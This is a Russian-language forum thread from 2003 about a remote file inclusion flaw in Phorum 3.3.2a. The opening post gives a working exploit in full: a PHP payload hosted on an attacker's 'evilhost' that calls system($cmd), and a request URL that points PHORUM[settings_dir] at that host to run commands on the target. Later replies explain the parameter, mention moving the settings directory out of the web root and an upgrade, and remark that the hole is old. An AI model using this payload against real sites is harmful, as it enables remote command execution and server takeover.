Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Уязвимость Phorum version 3.3.2a 07.02.03 03:36
Автор: Джон Статус: Незарегистрированный пользователь
|
Phorum - приложение программного обеспечения форума, написанное в php.
Недостаток защиты в программе позволяет удаленным пользователям включать
внешние php сценарии и выполнять произвольный код и команды. Пример: Создаем
файл replace.php на сайте evilhost:
<?
echo("<?
system(\"\$cmd\");
?>");
?> Если PHP не поддерживается, то вносим:
<?
system("$cmd");
?>
Затем:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
----------------------------------------------------------------
все понятно, но что имеется в виду под settings_dir, я что то не вкуриваю...
может кто подскажет?
|
|
Уязвимость Phorum version 3.3.2a 07.02.03 10:24
Автор: catlion <catlion> Статус: Member
|
> Phorum - приложение программного обеспечения форума,
> написанное в php.
> Недостаток защиты в программе позволяет удаленным
> пользователям включать
> внешние php сценарии и выполнять произвольный код и
> команды. Пример: Создаем
> файл replace.php на сайте evilhost:
> <?
> echo("<?
> system(\"\$cmd\");
> ?>");
> ?> Если PHP не поддерживается, то вносим:
> <?
> system("$cmd");
> ?>
> Затем:
>
> http://[target]/phorum/plugin/replace/plugin.php?PHORUM[set
> tings_dir]=http://[evilhost]&cmd=ls
> -----------------------------------------------------------
> -----
> все понятно, но что имеется в виду под settings_dir, я что
> то не вкуриваю...
> может кто подскажет?
/phorum/admin/settings
и кстати в файле install.txt сказано, что ее надо вынести за пределы дерева каталогов сервера (т.е. из htdocs). Уж не знаю, поможет ли:-
И еще, вышел стабильный phorum 3.4.1
|
| |
Ребята, этой дыре уже миллионы лет :) 12.02.03 03:00
Автор: Rara Avis Статус: Незарегистрированный пользователь
|
> > Phorum - приложение программного обеспечения форума,
> > написанное в php.
> > Недостаток защиты в программе позволяет удаленным
> > пользователям включать
> > внешние php сценарии и выполнять произвольный код и
> > команды. Пример: Создаем
> > файл replace.php на сайте evilhost:
> > <?
> > echo("<?
> > system(\"\$cmd\");
> > ?>");
> > ?> Если PHP не поддерживается, то вносим:
> > <?
> > system("$cmd");
> > ?>
> > Затем:
> >
> >
> http://[target]/phorum/plugin/replace/plugin.php?PHORUM[set
> > tings_dir]=http://[evilhost]&cmd=ls
> >
> -----------------------------------------------------------
> > -----
> > все понятно, но что имеется в виду под settings_dir, я
> что
> > то не вкуриваю...
> > может кто подскажет?
>
> /phorum/admin/settings
> и кстати в файле install.txt сказано, что ее надо вынести
> за пределы дерева каталогов сервера (т.е. из htdocs). Уж не
> знаю, поможет ли:-
>
> И еще, вышел стабильный phorum 3.4.1
РЕБЯТА, этой дыре уже миллионы лет :)
|
|
|
подробно о проекте
Анализ криптографических сетевых...
